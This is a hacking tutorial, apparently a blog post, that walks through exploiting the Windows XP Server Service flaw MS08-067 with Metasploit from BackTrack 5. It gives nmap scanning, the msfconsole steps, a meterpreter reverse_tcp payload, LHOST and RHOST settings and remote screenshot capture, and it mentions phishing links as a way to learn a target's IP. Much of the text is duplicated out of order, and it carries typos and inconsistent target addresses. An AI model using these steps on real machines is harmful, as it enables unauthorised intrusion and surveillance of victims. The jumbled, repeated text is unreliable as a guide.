In This Tutorial, I will be going to tell you how you can hack windows XP with Metasploit by using IP address of target machine. Because Windows XP’s are vulnerable(unpatched) OS(Operating System).
Let's move on how you can hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll by the Server service(CVE-2008-4250 ). Before moving into the actual exploitation process lets study about the Server Service Vulnerability.
The Server Service is vulnerable to an RCE(Remote Code Execution) vulnerability.NwtAPI32.dll is the cause of this vulnerability. There is an error in NETAPI32.dll while processing directory traversal character sequences in path names. This Vulnerability could be exploited by corrupting stack memory, for example, sending RPC requests that contain specially crafted path names to the Server Service component.The NetprPathCanonicalize() function in the file netapi32.dll gets affected.
Malicious requests to a vulnerable system may result in compromising the system completely.
The System that is vulnerable to this vulnerability is Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008.
If you don’t know how to create virtual machines, then read the VirtualBox Manual.
Find The IP address Of Target:
First Of All Goto Start Menu and Type ‘CMD’ and open command prompt in the Target Machine. Type in the command ‘ipconfig’ to find the IP address of target machine.
There are many different methods that hackers use to find the IP address of target system. They may use phishing links to get the IP address of the target system or they may use IP scanner software like Angry IP Scanner to scan all the IPs on their network.
Open the terminal machine in BackTrack 5 and type in the command “nmap –O 192.168.46.17”. 192.168.46.17 Is the IP address of the target system. Now you will get the result that will show you the list of all opened ports and version of operating system.
Open the Terminal in backtrack 5 and type in the command “msfconsole”.
The msfconsole is the most popular interface of Metasploit Framework. It Gives you all in one centralized console and allows to access all virtually available options in Metasploit Framework.
Now use the search command to find the exploit modules with the keyword netapi. Type “search netpi”.Now you will see a result of all modules match with netapi.
As we need to exploit MS08-067, so type in the command “set payload windows/meterpreter/reverse_tcp” to use this payload.
Now set RHOST to 192.168.56.12 by typing in the command “set RHOST 192.168.56.12“
When the exploit is successful you will get the following screen.
Now you can control the target machine using the meterprete. For example to get screenshot of the target just type the command “screenshot” you will get the screenshot of the target machine.
Let's move on how you can hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll by the Server service(CVE-2008-4250 ). Before moving into the actual exploitation process lets study about the Server Service Vulnerability.
Information Of Server Service Vulnerability(MS08-067):
The Servers of Microsoft Windows provides support for sharing resources such as files and print services over a network.The Server Service is vulnerable to an RCE(Remote Code Execution) vulnerability.NwtAPI32.dll is the cause of this vulnerability. There is an error in NETAPI32.dll while processing directory traversal character sequences in path names. This Vulnerability could be exploited by corrupting stack memory, for example, sending RPC requests that contain specially crafted path names to the Server Service component.The NetprPathCanonicalize() function in the file netapi32.dll gets affected.
Malicious requests to a vulnerable system may result in compromising the system completely.
The System that is vulnerable to this vulnerability is Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008.
Requirements to Exploit MS08-067 using Metasploit:
You need Following things to perform attack:
- VirtualBox
- Backtrack 5
- Target OS(XP)
Step 1:
First Of All, create two virtual Machines namely ‘Target’ and ‘BT5’.Now Install the Windows XP in Target VM and Backtrack in BT5 Virtual Machine. Turn On the both VMs.If you don’t know how to create virtual machines, then read the VirtualBox Manual.
Find The IP address Of Target:
First Of All Goto Start Menu and Type ‘CMD’ and open command prompt in the Target Machine. Type in the command ‘ipconfig’ to find the IP address of target machine.
There are many different methods that hackers use to find the IP address of target system. They may use phishing links to get the IP address of the target system or they may use IP scanner software like Angry IP Scanner to scan all the IPs on their network.
Gathering Information:
Now we need to get some information about the target machine. For this purpose, we will use the tool nmap.Open the terminal machine in BackTrack 5 and type in the command “nmap –O 192.168.46.17”. 192.168.46.17 Is the IP address of the target system. Now you will get the result that will show you the list of all opened ports and version of operating system.
Using Metasploit:
Open the Terminal in backtrack 5 and type in the command “msfconsole”.The msfconsole is the most popular interface of Metasploit Framework. It Gives you all in one centralized console and allows to access all virtually available options in Metasploit Framework.
Now use the search command to find the exploit modules with the keyword netapi. Type “search netpi”.Now you will see a result of all modules match with netapi.
As we need to exploit MS08-067, so type in the command “set payload windows/meterpreter/reverse_tcp” to use this payload.
Set Options:
Now set LHOST to 192.168.56.10 by giving this command “set LHOST 192.168.56.10“. Here 192.168.56.10 is the IP address of Backtrack Machine. You can get the IP of Backtrack machine by typing the command ‘ifconfig’ in the terminal.Now set RHOST to 192.168.56.12 by typing in the command “set RHOST 192.168.56.12“
Start Exploit:
Now we need to start the exploit. Just enter the command “exploit” in the console.When the exploit is successful you will get the following screen.
Now you can control the target machine using the meterprete. For example to get screenshot of the target just type the command “screenshot” you will get the screenshot of the target machine.